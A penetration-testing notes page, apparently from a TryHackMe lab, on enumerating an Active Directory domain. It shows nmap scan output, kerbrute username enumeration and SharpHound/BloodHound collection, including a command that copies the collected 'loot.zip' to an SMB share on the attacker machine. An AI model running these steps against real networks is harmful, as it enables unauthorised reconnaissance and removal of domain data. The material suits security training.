Skip to content

Active Directory - Enumeration

Information gathering

Information gathering on services like RDP can tell you relatively good information about an Active Diretory host or domain.

  • Target : THM-AD
  • Domain : spookysec.local
  • DNS Enty : AttacktiveDirectory.spookysec.local
$ nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389 -sV -sC -oN scan.vuln.nmap 10.10.169.152
[...]
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-02-13T17:33:50
|_Not valid after:  2022-08-15T17:33:50
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-14T18:27:20+00:00
|_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]

User enumeration

$ kerbrute userenum --dc 10.10.169.152 -d spookysec.local userlist.txt
[...]
2022/02/14 19:37:15 >  Using KDC(s):
2022/02/14 19:37:15 >   10.10.169.152:88

2022/02/14 19:37:16 >  [+] VALID USERNAME:       james@spookysec.local
2022/02/14 19:37:17 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2022/02/14 19:37:19 >  [+] VALID USERNAME:       James@spookysec.local
2022/02/14 19:37:20 >  [+] VALID USERNAME:       robin@spookysec.local
2022/02/14 19:37:28 >  [+] VALID USERNAME:       darkstar@spookysec.local
2022/02/14 19:37:33 >  [+] VALID USERNAME:       administrator@spookysec.local
[...]

BloodHound

BloodHound allows you to make a graph of an Active Directory domain and quickly find misconfiguration vulnerabilities in it.

Get started

  1. Download SharpHound on the victim host.
  2. Using powershell version :
    1. Load SharpHound : .\SharpHound.ps1
    2. Start SharpHound collection : Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
  3. Using exectuable version :
    1. Start SharpHound collection : .\SharpHound.exe -d CONTROLLER.local --zipfilename loot.zip
  4. Download the archive result on your attacker machine : copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
  5. Run neo4j server : sudo docker run --rm -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/toto -v /tmp/neo4j/data:/data neo4j
  6. Run BloodHound : Download release and execute ./BloodHound-linux-x64/BloodHound
    • Host : bolt://localhost:7687
    • Username : neo4j
    • Password : toto
  7. Drag and drop loot.zip into Bloodhound.

You can run pre-defined queries by clicking on <menu burger icon>, then Analysis and finally on the queries you want to execute.

References